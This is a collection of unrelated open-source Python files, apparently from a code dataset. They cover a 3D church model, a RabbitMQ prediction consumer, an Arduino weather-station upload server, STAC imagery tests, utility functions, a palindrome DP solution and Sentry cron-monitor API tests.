Classifier\")\r\nplt.show()","repo_name":"anayasusangeorge/labexam","sub_path":"prg2.py","file_name":"prg2.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"28725907220","text":"from pyplasm import *\n\n\ndef HEMISPHERE(radius):\n    \"\"\"\n    Hemisphere\n    :param radius:\n    :return:\n    \"\"\"\n    def HEMISPHERE1(subds):\n        N, M = subds\n        domain = Plasm.translate( Plasm.power(INTERVALS(PI/2)(N), INTERVALS(2*PI)(M)), Vecf(0, -PI/2, 0))\n        fx = lambda p: radius * math.cos(p[0]) * math.sin(p[1])\n        fy = lambda p: radius * math.cos(p[0]) * math.cos(p[1])\n        fz = lambda p: radius * math.sin(p[0])\n        ret = MAP([fx, fy, fz])(domain)\n        return ret\n    return HEMISPHERE1\n\n\ndef church(base=1, numberOfColumns=8, ratio=.809):\n    \"\"\"\n    Returns a PyPlasm object that models a church.\n    :param base:\n    :param ratio:\n    :param numberOfColumns:\n    :return:\n    \"\"\"\n\n    def centeredCuboid(a, b, c):\n        \"\"\"\n        Returns a centered CUBOID\n        :param a:\n        :param b:\n        :param c:\n        :return:\n        \"\"\"\n        return T([1, 2])([-float(b)/2, -float(b)/2])(CUBOID([a, b, c]))\n\n    def getHemisphere():\n        \"\"\"\n        Returns a hemisphere\n        :return:\n        \"\"\"\n        return R([1, 3])(-PI)(HEMISPHERE(1)([8, 8]))\n\n    def arrangedCircularly(o, r, n=numberOfColumns):\n        \"\"\"\n        Arranges a PyPlasm object circularly\n        :param o:\n        :param r:\n        :param n:\n        :return:\n        \"\"\"\n        return STRUCT(map(lambda i: T([1, 2])([\n            r*math.cos((2 * PI / n) * i),\n            r*math.sin((2 * PI / n) * i)\n        ])(R([1, 2])((2 * PI / n) * i)(o)), range(0, n)))\n\n    def getCylinder():\n        \"\"\"\n        Returns a decorated and colored cylinder\n        :return:\n        \"\"\"\n        c1 = \"#878787\"\n        c2 = \"#afafaf\"\n        c3 = \"#cecece\"\n        c4 = 
\"#e8e8e8\"\n c5 = \"#5c1b1b\"\n return STRUCT([\n HEX(c1)(T(3)(ratio - .05)(CYLINDER([1.05, .05])(8))),\n HEX(c2)(T(3)(ratio - .1)(CYLINDER([1.025, .05])(8))),\n HEX(c3)(T(3)(ratio - .15)(CYLINDER([1.0125, .05])(8))),\n HEX(c4)(DIFFERENCE([\n CYLINDER([1, ratio - .15])(8),\n CYLINDER([.9, ratio - .15])(8),\n HEX(c5)(\n T(3)(.075)(R([1, 2])(PI / 8)(arrangedCircularly(centeredCuboid(.08, PI / 8, ratio - 0.3), 1.05, 8)))),\n ])),\n HEX(c5)(T(3)(.075)(R([1, 2])(PI / 8)(arrangedCircularly(centeredCuboid(.04, PI / 8, ratio - 0.3), 1.05, 8)))),\n ])\n\n def getColumn():\n \"\"\"\n Returns a cylinder with a hemisphere over it.\n :return:\n \"\"\"\n cylinder = getCylinder()\n return STRUCT([\n cylinder,\n HEX(\"#5C1B1B\")(T(3)(ratio)(getHemisphere()))\n ])\n\n def render():\n return STRUCT([\n\n # scalini\n T(3)(0.000)(S([1, 2])([1.00, 1.00])(CYLINDER([1, 0.025])(8))),\n T(3)(0.025)(S([1, 2])([0.95, 0.95])(CYLINDER([1, 0.025])(8))),\n T(3)(0.050)(S([1, 2])([0.90, 0.90])(CYLINDER([1, 0.025])(8))),\n\n # base\n T(3)(0.075)(S([1, 2, 3])([.85, .85, .85])(getCylinder())),\n\n # cupola centrale\n T(3)(0.075 + ratio * .85)(S([1, 2, 3])([.425, .425, .425])(getColumn())),\n\n # cupole laterali 0,2125\n T(3)(0.075 + ratio * .85)(arrangedCircularly(S([1, 2, 3])([.2125, .2125, .2125])(getColumn()), .425 + .2125)),\n\n ])\n\n return S([1, 2, 3])([base, base, base])(render())\n","repo_name":"romatre/ggpl","sub_path":"2017-11-06/lib/church.py","file_name":"church.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"32156811237","text":"from flask import Flask , render_template\nfrom retry import retry\nimport pika\nimport time\nimport json\nfrom code_challenge_base_predictor import Predictor\n\nprint(\"launching sciflask\",flush=True)\n\nclass ConsumePredictReturn():\n\tdef __init__(self,queue):\n\n\t\tself.queue = queue\n\t\tself.Model = Predictor()\n\t\tprint(\"running now\")\n\t\tself.Consume()\n\n\t# sends back the probabilities to a new queue probabilities return\n\tdef ReturnSignals(self,inputs, results):\n\t\tself.channel.basic_publish(exchange='',\n\t\t routing_key='probabilities_return',\n\t\t body=json.dumps(inputs.extend(list(results[0]))))\n\t\tprint(\"returned prob..{}\".format(inputs))\n\n\t# on consume, take in data, run through model, return signal, deliver Ack\t\n\tdef callback(self,ch,method,properties,body):\n\t\tinputs = json.loads(body)\n\t\tresults = self.Model.predict(json.loads(body))\n\t\tself.ReturnSignals(inputs, results)\n\t\tch.basic_ack(delivery_tag = method.delivery_tag)\n\n\t\t\n\t\n\t# Try Connecting and consuming data from queue,\n\t#retry handles race condition makes code a tiny bit more robust. 
\n\t@retry(pika.exceptions.AMQPConnectionError, delay=5,jitter=(1,3))\n\tdef Consume(self):\n\n\t\tcredentials = pika.PlainCredentials('rabbitmq', 'rabbitmq')\n\t\tself.connection = pika.BlockingConnection(pika.ConnectionParameters('rabbit1',5672,'/',credentials))\n\t\tself.channel = self.connection.channel()\n\t\tself.channel.queue_declare(queue = self.queue)\n\t\tself.channel.queue_declare(queue = 'probabilities_return')\n\t\tself.channel.basic_consume(queue=self.queue,on_message_callback=self.callback)\n\t\ttry:\n\t\t\tself.channel.start_consuming()\n\t\texcept KeyboardInterrupt:\n\t\t\tself.channel.stop_consuming()\n\t\t\tself.connection.close()\n\t\texcept pika.exceptions.ConnectionClosedByBroker:\n\t\t\tpass\n\nConsumePredictReturn('queue1')\n\n#app = Flask(__name__)\n\t#\n\t#@app.route('/')\n\t#def home():\n\t#\treturn render_template('template.html',my_string=log)\n\t#\n\n\t#app.run(debug=True,host='0.0.0.0')","repo_name":"MatthewLennie/BayesProject","sub_path":"SciFlask/Hello.py","file_name":"Hello.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"3912166227","text":"#!/usr/bin/python3 \n\n# Open source weather station for ERC Altiplano, based on an Arduino Uno\n# Server-side code\n# (c)2018-2019, Levien van Zon (levien at gnuritas .org)\n# Further information: \n# http://gnuritas.org/weatherstation.html\n# https://github.com/lvzon/weatherstation\n\nfrom datetime import datetime\nimport select\n\n# Bind to localhost, port 9000\nHOST, PORT = \"\", 9000\n\n# CWOP station ID, password and location\ncwop_station = 'BLA'\ncwop_pass = '-1'\n# Attention, format of the location is bit special. Although there is a dot, the values are in degrees, minutes and seconds!\ncwop_position = '9999.99N/88888.88W_'\n\n# Weather Underground user and password\nwu_station = 'BLA'\nwu_password = 'blabla'\n\n# Variables sent by the Arduino weather station\n\nvars=['start','duration','T_mean','T_min','T_max','RH_mean','RH_min','RH_max','rain_mm','rain_mm_sum','wind_mean','wind_min','wind_max','winddir_mean','winddir_max','I_mean','runtime_s','pressure_mbar','T_soil']\n\n# Open your data output file\n\ncsv = open('weatherdata.csv', 'a')\n#print('servertime,start,duration,T_mean,T_min,T_max,RH_mean,RH_min,RH_max,rain_mm,rain_mm_sum,wind_mean,wind_min,wind_max,winddir_mean,winddir_max,I_mean', file=csv)\n\n# Open additional files for dumping Weather Underground URLs and invalid data \n\nurls = open('wu_urls.txt', 'a')\ninvalid = open('invalid_data.txt', 'a')\n\ndef C_to_F (celsius):\n return round(9.0 / 5.0 * celsius + 32, 2)\n\ndef kmh_to_mph (kmh):\n return round(kmh / 1.60934, 2)\n\ndef mm_to_inch (mm):\n return round(mm / 25.4, 2)\n\ndir_to_degrees = {'N': 0,'NE': 45,'E': 90,'SE': 135,'S': 180,'SW': 225,'W': 270,'NW': 315, 'NA': None}\n\nimport math\n\ndef get_dew_point_c(t_air_c, rel_humidity):\n \"\"\"Compute the dew point in degrees Celsius\n :param t_air_c: current ambient temperature in degrees Celsius\n :type t_air_c: float\n :param rel_humidity: relative humidity in %\n :type rel_humidity: float\n :return: the dew point in degrees Celsius\n :rtype: float\n \"\"\"\n # Source: https://gist.github.com/sourceperl/45587ea99ff123745428\n A = 17.27\n B = 237.7\n alpha = ((A * t_air_c) / (B + t_air_c)) + math.log(rel_humidity/100.0)\n return (B * alpha) / (A - alpha)\n\n\nimport urllib.request\n\ndef generate_wureq (valdict):\n \n ts = valdict['servertime']\n dateutc = 
datetime.utcfromtimestamp(ts).strftime(\"%Y-%m-%d+%H%%3A%M%%3A%S\") # [YYYY-MM-DD HH:MM:SS (mysql format)] In Universal Coordinated Time (UTC) Not local time\n tempf = str(C_to_F(valdict['T_mean'])) # [F outdoor temperature] \n humidity = str(valdict['RH_mean']) # [% outdoor humidity 0-100%]\n dailyrainin = str(mm_to_inch(valdict['rain_mm_sum'])) # [rain inches so far today in local time]\n windspdmph_avg2m = str(kmh_to_mph(valdict['wind_mean'])) # [mph 2 minute average wind speed mph]\n winddir_avg2m = str(valdict['winddir_mean']) # [0-360 2 minute average wind direction]\n windgustmph_10m = str(kmh_to_mph(valdict['wind_max'])) # [mph past 10 minutes wind gust mph ]\n \n wind_max_deg = dir_to_degrees[valdict['winddir_max']]\n windgustdir_10m = str(wind_max_deg) # [0-360 past 10 minutes wind gust direction]\n\n dewptf = str(C_to_F(get_dew_point_c(valdict['T_mean'], valdict['RH_mean'])))\n\n paramstr = 'ID=' + wu_station + '&PASSWORD=' + wu_password + '&dateutc=' + dateutc + '&tempf=' + tempf + '&humidity=' + humidity + '&dewptf=' + dewptf + '&dailyrainin=' + dailyrainin + '&windspeedmph=' + windspdmph_avg2m + '&winddir=' + winddir_avg2m + '&windgustmph=' + windgustmph_10m\n \n if wind_max_deg is not None:\n paramstr = paramstr + '&windgustdir=' + windgustdir_10m\n \n return 'https://weatherstation.wunderground.com/weatherstation/updateweatherstation.php?' + paramstr\n\n\nimport sys, os, time\nfrom datetime import datetime, timedelta\nfrom socket import *\n\ncwop_host = 'cwop.aprs.net'\ncwop_port = 14580\ncwop_address = cwop_station + '>APRS,TCPIP*:'\n\ndef make_aprs_wx(wind_dir=None, wind_speed=None, wind_gust=None, temperature=None, rain_last_hr=None, rain_last_24_hrs=None, rain_since_midnight=None, humidity=None, pressure=None):\n # Assemble the weather data of the APRS packet\n def str_or_dots(number, length):\n # If parameter is None, fill with dots, otherwise pad with zero\n if number is None:\n return '.'*length\n else:\n format_type = {\n 'int': 'd',\n 'float': '.0f',\n }[type(number).__name__]\n return ''.join(('%0',str(length),format_type)) % number\n return '%s/%sg%st%sr%sp%sP%sh%sb%s' % (\n str_or_dots(wind_dir, 3),\n str_or_dots(wind_speed, 3),\n str_or_dots(wind_gust, 3),\n str_or_dots(temperature, 3),\n str_or_dots(rain_last_hr, 3),\n str_or_dots(rain_last_24_hrs, 3),\n str_or_dots(rain_since_midnight, 3),\n str_or_dots(humidity, 2),\n str_or_dots(pressure, 5),\n )\n\n\ndef cwop_send_packet(valdict):\n\n rh = valdict['RH_mean']\n if rh > 99.9:\n rh = 99.9\n\n ts = valdict['servertime']\n # Attention, temperature in Fahrenheit!\n fahrenheit = C_to_F(valdict['T_mean'])\n humidity = rh\n # Attention, barometric pressure in tenths of millibars/tenths of hPascal!\n #pressure = press[2][0][1] * 10\n pressure = valdict['pressure_mbar'] * 10\n \n # If you have wind and rain data, get it here. 
Be aware that values are required in mph and in hundredths of an inch!\n    wind_degrees = dir_to_degrees[valdict['winddir_max']]\n    wind_mph = kmh_to_mph(valdict['wind_mean'])\n    wind_gust_mph = kmh_to_mph(valdict['wind_max'])\n    precip_today_in = mm_to_inch(valdict['rain_mm_sum'])\n    \n    # Prepare the data, which will be sent\n    wx_data = make_aprs_wx(wind_degrees, wind_mph, wind_gust_mph, fahrenheit, None, None, precip_today_in * 100.0, humidity, pressure)\n    # Use UTC\n    utc_datetime = datetime.utcfromtimestamp(ts)\n    # Create socket and connect to server\n    sSock = socket(AF_INET, SOCK_STREAM)\n    sSock.connect((cwop_host, cwop_port))\n    # Log on (build the login line as str, then encode it for the socket)\n    sSock.send(('user ' + cwop_station + ' pass ' + cwop_pass + ' vers Python\\n').encode('ascii'))\n    # Send packet\n    packetstr = cwop_address + '@' + utc_datetime.strftime(\"%d%H%M\") + 'z' + cwop_position + wx_data + 'Arduino\\n'\n    sSock.send(packetstr.encode('ascii'))\n    # Close socket, must be closed to avoid buffer overflow\n    sSock.shutdown(0)\n    sSock.close()\n    \n\ndef decode_line(line):\n    \n    vals = line.rstrip().split(',')\n    \n    if (len(vars) == len(vals)):\n        \n        valdict = dict(zip(vars, vals))\n        for key, value in valdict.items():\n            try:\n                num = float(value)\n                valdict[key] = num\n            except ValueError:\n                pass\n        \n        ts = valdict['start']\n        \n        try:\n            \n            valdict['servertime'] = int(datetime.now().timestamp())\n            #valdict['servertime'] = int(valdict['start'] + valdict['duration'])\n            \n            print(datetime.utcfromtimestamp(ts))\n            print(valdict)\n            \n            url = generate_wureq(valdict)\n            print(url, file=urls)\n            contents = urllib.request.urlopen(url).read()\n            \n            cwop_send_packet(valdict)\n            \n            return str(valdict['servertime']) + ',' + line\n        \n        except:\n            pass\n    \n    print(\"invalid line\")\n    print(line, file=invalid)\n\n    return None\n\n\ndef read_line(fd, timeout):\n    \n    inputs = [fd]\n    \n    chars = []\n    line = ''\n    failed = 0\n    \n    readable, writable, exceptional = select.select(inputs, [], inputs, timeout)\n    # Loop until a full line is read or we accumulate `timeout` one-second time-outs;\n    # chars starts empty, so the emptiness check must allow entering the loop.\n    while failed < timeout and (not chars or chars[-1] != b'\\n'):\n        \n        if not (readable or writable or exceptional):\n            print('1-second time-out')\n            failed += 1\n            readable, writable, exceptional = select.select(inputs, [], inputs, 1)\n            continue \n        \n        for s in readable:\n            char = s.recv(1)\n            chars.append(char)\n            line = b''.join(chars).decode('utf_8', errors='replace')\n            print('Received char', char, 'and appended to line:', line)\n        \n        readable, writable, exceptional = select.select(inputs, [], inputs, 1)\n\n    if chars and chars[-1] == b'\\n':\n        print('Line received:', line)\n        return line\n    else:\n        print('No line received:', line)\n        print(line, file=invalid)\n        return None\n    \n    \n    \nimport socketserver\n\nclass MyTCPHandler(socketserver.StreamRequestHandler):\n\n    def handle(self):\n        # self.rfile is a file-like object created by the handler;\n        # we can now use e.g. 
readline() instead of raw recv() calls\n #try:\n #line = self.rfile.readline()\n \n inputs = [self.rfile]\n timeout = 60\n readable, writable, exceptional = select.select(inputs, [], inputs, timeout)\n \n if not (readable or writable or exceptional):\n print('Timed out while waiting for data on socket')\n return \n \n #line = read_line(self.rfile, 30)\n line = self.rfile.readline()\n \n while line:\n \n print(\"Data received from {}:\".format(self.client_address[0]))\n try:\n line = line.decode('utf_8')\n csvline = decode_line(line)\n if csvline:\n csv.write(csvline)\n except:\n print('invalid data received')\n print(line, file=invalid)\n\n #line = read_line(self.rfile, 30)\n line = self.rfile.readline()\n\nif __name__ == \"__main__\":\n\n # Create the server, binding to localhost\n server = socketserver.TCPServer((HOST, PORT), MyTCPHandler)\n\n # Activate the server; this will keep running until you\n # interrupt the program with Ctrl-C\n server.serve_forever()\n\n\ncsv.close()\n\n","repo_name":"lvzon/weatherstation","sub_path":"weatherstation-server.py","file_name":"weatherstation-server.py","file_ext":"py","file_size_in_byte":9783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"11126853914","text":"import pickle\r\nfrom xai.compiler.base import Configuration, Controller\r\nimport os\r\nfrom pprint import pprint\r\nimport numpy as np\r\n\r\nnp.random.seed(123456)\r\n\r\nroot_path = '/training'\r\n\r\nif __name__ == '__main__':\r\n pprint(\"Entered explainer step\")\r\n with open('{}/input/train.pickle'.format(root_path), 'rb') as f:\r\n X_train, y_train = pickle.load(f)\r\n\r\n with open('{}/input/model.pickle'.format(root_path), 'rb') as f:\r\n clf = pickle.load(f)\r\n\r\n with open('{}/input/func.pickle'.format(root_path), 'rb') as f:\r\n clf_fn = pickle.load(f)\r\n\r\n feature_names = X_train.columns.tolist()\r\n feature_importance_algorithm = \"shap\"\r\n learning_type = os.environ['LEARNING_TYPE']\r\n domain_type = os.environ['DOMAIN_TYPE']\r\n model_interpretor_algorithm = os.environ['MODEL_INTERPRETOR_ALG']\r\n model_explainer_algorithm = os.environ['MODEL_EXPLAINER_ALG']\r\n target_names_list =['good', 'bad']\r\n model_interpretor_strategy = os.environ['MODEL_INTERPRETOR_STRATEGY']\r\n model_interpret_k_value = int(os.environ['MODEL_INTERPRETOR_K_VALUE']) \r\n pprint(\"Learning_type = \" + learning_type)\r\n pprint(\"Domain_type = \" + domain_type)\r\n\r\n model_interpret_top_value = 8\r\n num_of_class = 2\r\n json_config = 'basic-report-explainable.json'\r\n controller = Controller(config=Configuration(json_config, locals()))\r\n pprint(controller.config)\r\n controller.render()\r\n pprint(\"Completed explainer step\")\r\n","repo_name":"manduripramodh/argoworkflows","sub_path":"steps/explanability.py","file_name":"explanability.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31274475177","text":"from math import cos, pi, sin\n\n\ndef chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i : i + n]\n\n\ndef print_hex(data: bytes):\n per_row = 16\n per_split = 8\n\n for i in range(0, len(data), per_row):\n chunk = data[i : i + per_row]\n\n adr = f\"{i:04x}\"\n char_values = [chr(b) if b >= 32 and b < 128 else \".\" for b in chunk]\n\n splits = [c for c in chunks(chunk, per_split)]\n\n hex_splits = [\" \".join([f\"{b:02X}\" for b in spl]) for spl in 
splits]\n hex_values = \" \".join(hex_splits)\n\n char_values = \"\".join(char_values)\n pad1 = \" \" * ((per_row - len(chunk)) % per_row)\n pad2 = \" \" * (per_row // per_split - len(splits))\n\n print(f\"{adr}: {hex_values}{pad1}{pad2} {char_values}\")\n\n\ndef print_header(hdr: str, underline: str = \"-\"):\n print(f\"{hdr}\\n{underline * len(hdr)}\")\n\n\ndef rotate(x: float, y: float, angle: float):\n dx = cos(angle) * x - sin(angle) * y\n dy = sin(angle) * x + cos(angle) * y\n return dx, dy\n\n\ndef d2r(degrees: float):\n return degrees * (pi / 180.0)\n","repo_name":"jomag/vargtass","sub_path":"vargtass/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31548537579","text":"from datetime import datetime\n\nfrom scripts.files.files_helper import get_file_name_from_path\nfrom scripts.stac.imagery.collection import ImageryCollection\nfrom scripts.stac.imagery.item import ImageryItem\nfrom scripts.stac.imagery.metadata_constants import CollectionTitleMetadata\n\n\ndef test_imagery_stac_item(mocker) -> None: # type: ignore\n # mock functions that interact with files\n geometry = {\n \"type\": \"Polygon\",\n \"coordinates\": [[[1799667.5, 5815977.0], [1800422.5, 5815977.0], [1800422.5, 5814986.0], [1799667.5, 5814986.0]]],\n }\n bbox = (1799667.5, 5815977.0, 1800422.5, 5814986.0)\n checksum = \"1220cdef68d62fb912110b810e62edc53de07f7a44fb2b310db700e9d9dd58baa6b4\"\n mocker.patch(\"scripts.stac.util.checksum.multihash_as_hex\", return_value=checksum)\n\n path = \"./test/BR34_5000_0302.tiff\"\n id_ = get_file_name_from_path(path)\n start_datetime = \"2021-01-27 00:00:00Z\"\n end_datetime = \"2021-01-27 00:00:00Z\"\n\n item = ImageryItem(id_, path)\n item.update_spatial(geometry, bbox)\n item.update_datetime(start_datetime, end_datetime)\n # checks\n assert item.stac[\"id\"] == id_\n assert item.stac[\"properties\"][\"start_datetime\"] == start_datetime\n assert item.stac[\"properties\"][\"end_datetime\"] == end_datetime\n assert item.stac[\"properties\"][\"datetime\"] is None\n assert item.stac[\"geometry\"][\"coordinates\"] == geometry[\"coordinates\"]\n assert item.stac[\"geometry\"] == geometry\n assert item.stac[\"bbox\"] == bbox\n assert item.stac[\"assets\"][\"visual\"][\"file:checksum\"] == checksum\n assert {\"rel\": \"self\", \"href\": f\"./{id_}.json\", \"type\": \"application/json\"} in item.stac[\"links\"]\n\n\ndef test_imagery_add_collection(mocker) -> None: # type: ignore\n metadata: CollectionTitleMetadata = {\n \"category\": \"Urban Aerial Photos\",\n \"region\": \"auckland\",\n \"gsd\": \"0.3m\",\n \"start_datetime\": datetime(2022, 2, 2),\n \"end_datetime\": datetime(2022, 2, 2),\n \"lifecycle\": \"completed\",\n \"location\": None,\n \"event\": None,\n \"historic_survey_number\": None,\n }\n ulid = \"fake_ulid\"\n collection = ImageryCollection(title_metadata=metadata, collection_id=ulid)\n\n path = \"./test/BR34_5000_0302.tiff\"\n id_ = get_file_name_from_path(path)\n checksum = \"1220cdef68d62fb912110b810e62edc53de07f7a44fb2b310db700e9d9dd58baa6b4\"\n mocker.patch(\"scripts.stac.util.checksum.multihash_as_hex\", return_value=checksum)\n item = ImageryItem(id_, path)\n\n item.add_collection(collection.stac[\"id\"])\n\n assert item.stac[\"collection\"] == ulid\n assert {\"rel\": \"collection\", \"href\": \"./collection.json\", \"type\": \"application/json\"} in item.stac[\"links\"]\n assert {\"rel\": \"parent\", \"href\": 
\"./collection.json\", \"type\": \"application/json\"} in item.stac[\"links\"]\n","repo_name":"linz/topo-imagery","sub_path":"scripts/stac/tests/item_test.py","file_name":"item_test.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"92"} +{"seq_id":"41560413708","text":"class Solution:\n def print_DP(self,DP):\n for row in DP:\n print(row)\n print(\"--------------------------\")\n \n def longestPalindromeSubseq(self, s: str) -> int:\n '''\n a i==j DP[i][j] = 1\n a*****a s[i]==s[j] DP[i][j] = DP[i+1][j-1] + 2\n a*****b s[i] != s[j] DP[i][j] = max(DP[i+1][j] , DP[i][j-1])\n '''\n n = len(s)\n DP = []\n for r in range(n):\n row = [0]*n\n DP.append(row)\n\n # l = len(substr)\n for l in range(n):\n for i in range(n-l):\n j = i+l\n if(i == j):\n DP[i][j] = 1\n continue\n if(s[i] == s[j]):\n DP[i][j] = DP[i+1][j-1] + 2\n else:\n DP[i][j] = max(DP[i+1][j],DP[i][j-1])\n self.print_DP(DP)\n \n return DP[0][n-1]\n\n\n\n\n\ns = \"bbbab\" \nsol = Solution()\nprint(sol.longestPalindromeSubseq(s))\n","repo_name":"TheozZeng/Leetcode","sub_path":"Q_by_Topic/DP/516. Longest Palindromic Subsequence.py","file_name":"516. Longest Palindromic Subsequence.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40085787888","text":"# Nathan Glikman\n# Project 1\n# ts.py\n\nimport socket as mysoc\n\n# Set up server socket\n\ntry:\n\tts = mysoc.socket(mysoc.AF_INET, mysoc.SOCK_STREAM)\n\tprint(\"TS server created successfully\")\nexcept mysoc.error as err:\n\tprint('{} \\n'.format(\"Error creating TS socket\", err))\n\n# Bind RS server to port 69696 and enable listening\nserver_binding = ('', 69696)\nts.bind(server_binding)\nts.listen(1)\n\n# Wait for client to connect\nclientid, addr = ts.accept()\n","repo_name":"nster98/InternetTechnologySp20","sub_path":"project1/ts.py","file_name":"ts.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40546375073","text":"from __future__ import annotations\n\nfrom datetime import datetime, timedelta\nfrom unittest.mock import patch\n\nfrom django.conf import settings\nfrom django.test.utils import override_settings\n\nfrom sentry.api.fields.sentry_slug import DEFAULT_SLUG_ERROR_MESSAGE\nfrom sentry.constants import ObjectStatus\nfrom sentry.models.rule import Rule, RuleSource\nfrom sentry.monitors.models import Monitor, MonitorStatus, MonitorType, ScheduleType\nfrom sentry.testutils.cases import MonitorTestCase\nfrom sentry.testutils.silo import region_silo_test\nfrom sentry.utils.outcomes import Outcome\n\n\n@region_silo_test\nclass ListOrganizationMonitorsTest(MonitorTestCase):\n endpoint = \"sentry-api-0-organization-monitor-index\"\n\n def setUp(self):\n super().setUp()\n self.login_as(self.user)\n\n def check_valid_response(self, response, expected_monitors):\n assert [monitor.slug for monitor in expected_monitors] == [\n monitor_resp[\"slug\"] for monitor_resp in response.data\n ]\n\n def check_valid_environments_response(self, response, monitor, expected_environments):\n assert {\n monitor_environment.environment.name for monitor_environment in expected_environments\n } == {\n monitor_environment_resp[\"name\"]\n for monitor_environment_resp in monitor.get(\"environments\", [])\n }\n\n def test_simple(self):\n monitor = self._create_monitor()\n response = 
self.get_success_response(self.organization.slug)\n self.check_valid_response(response, [monitor])\n\n def test_sort(self):\n last_checkin = datetime.now() - timedelta(minutes=1)\n last_checkin_older = datetime.now() - timedelta(minutes=5)\n\n def add_status_monitor(status_key: str, date: datetime | None = None):\n monitor_status = getattr(MonitorStatus, status_key)\n # TODO(rjo100): this is precursor to removing the MonitorStatus values from Monitors\n monitor = self._create_monitor(\n status=ObjectStatus.ACTIVE,\n name=status_key,\n )\n self._create_monitor_environment(\n monitor,\n name=\"jungle\",\n last_checkin=(date or last_checkin) - timedelta(seconds=30),\n status=monitor_status,\n )\n self._create_monitor_environment(\n monitor,\n name=\"volcano\",\n last_checkin=(date or last_checkin) - timedelta(seconds=15),\n status=MonitorStatus.DISABLED,\n )\n return monitor\n\n # Subsort next checkin time\n monitor_active = add_status_monitor(\"ACTIVE\")\n monitor_ok = add_status_monitor(\"OK\")\n monitor_disabled = add_status_monitor(\"DISABLED\")\n monitor_error_older_checkin = add_status_monitor(\"ERROR\", last_checkin_older)\n monitor_error = add_status_monitor(\"ERROR\")\n monitor_missed_checkin = add_status_monitor(\"MISSED_CHECKIN\")\n monitor_timed_out = add_status_monitor(\"TIMEOUT\")\n\n response = self.get_success_response(\n self.organization.slug, params={\"environment\": \"jungle\"}\n )\n self.check_valid_response(\n response,\n [\n monitor_error,\n monitor_error_older_checkin,\n monitor_timed_out,\n monitor_missed_checkin,\n monitor_ok,\n monitor_active,\n monitor_disabled,\n ],\n )\n\n def test_all_monitor_environments(self):\n monitor = self._create_monitor()\n monitor_environment = self._create_monitor_environment(\n monitor, name=\"test\", status=MonitorStatus.OK\n )\n\n monitor_empty = self._create_monitor(name=\"empty\")\n\n response = self.get_success_response(self.organization.slug)\n self.check_valid_response(response, [monitor, monitor_empty])\n self.check_valid_environments_response(response, response.data[0], [monitor_environment])\n self.check_valid_environments_response(response, response.data[1], [])\n\n def test_monitor_environment(self):\n monitor = self._create_monitor()\n self._create_monitor_environment(monitor)\n\n monitor_hidden = self._create_monitor(name=\"hidden\")\n self._create_monitor_environment(monitor_hidden, name=\"hidden\")\n\n response = self.get_success_response(self.organization.slug, environment=\"production\")\n self.check_valid_response(response, [monitor])\n\n def test_monitor_environment_include_new(self):\n monitor = self._create_monitor()\n self._create_monitor_environment(\n monitor, status=MonitorStatus.OK, last_checkin=datetime.now() - timedelta(minutes=1)\n )\n\n monitor_visible = self._create_monitor(name=\"visible\")\n\n response = self.get_success_response(\n self.organization.slug, environment=\"production\", includeNew=True\n )\n self.check_valid_response(response, [monitor, monitor_visible])\n\n def test_search_by_slug(self):\n monitor = self._create_monitor(slug=\"test-slug\")\n self._create_monitor(slug=\"other-monitor\")\n\n response = self.get_success_response(self.organization.slug, query=\"test-slug\")\n self.check_valid_response(response, [monitor])\n\n def test_ignore_pending_deletion_environments(self):\n monitor = self._create_monitor()\n self._create_monitor_environment(\n monitor,\n status=MonitorStatus.OK,\n last_checkin=datetime.now() - timedelta(minutes=1),\n )\n self._create_monitor_environment(\n monitor,\n 
status=MonitorStatus.PENDING_DELETION,\n name=\"deleted_environment\",\n last_checkin=datetime.now() - timedelta(minutes=1),\n )\n\n response = self.get_success_response(self.organization.slug)\n self.check_valid_response(response, [monitor])\n # Confirm we only see the one 'ok' environment\n assert len(response.data[0][\"environments\"]) == 1\n assert response.data[0][\"environments\"][0][\"status\"] == \"ok\"\n\n\n@region_silo_test\nclass CreateOrganizationMonitorTest(MonitorTestCase):\n endpoint = \"sentry-api-0-organization-monitor-index\"\n method = \"post\"\n\n def setUp(self):\n super().setUp()\n self.login_as(self.user)\n\n @patch(\"sentry.analytics.record\")\n def test_simple(self, mock_record):\n data = {\n \"project\": self.project.slug,\n \"name\": \"My Monitor\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n response = self.get_success_response(self.organization.slug, **data)\n\n monitor = Monitor.objects.get(slug=response.data[\"slug\"])\n assert monitor.organization_id == self.organization.id\n assert monitor.project_id == self.project.id\n assert monitor.name == \"My Monitor\"\n assert monitor.status == ObjectStatus.ACTIVE\n assert monitor.type == MonitorType.CRON_JOB\n assert monitor.config == {\n \"schedule_type\": ScheduleType.CRONTAB,\n \"schedule\": \"0 0 * * *\",\n \"checkin_margin\": None,\n \"max_runtime\": None,\n \"failure_issue_threshold\": None,\n \"recovery_threshold\": None,\n }\n\n self.project.refresh_from_db()\n assert self.project.flags.has_cron_monitors\n\n mock_record.assert_any_call(\n \"cron_monitor.created\",\n user_id=self.user.id,\n organization_id=self.organization.id,\n project_id=self.project.id,\n from_upsert=False,\n )\n mock_record.assert_called_with(\n \"first_cron_monitor.created\",\n user_id=self.user.id,\n organization_id=self.organization.id,\n project_id=self.project.id,\n from_upsert=False,\n )\n\n def test_slug(self):\n data = {\n \"project\": 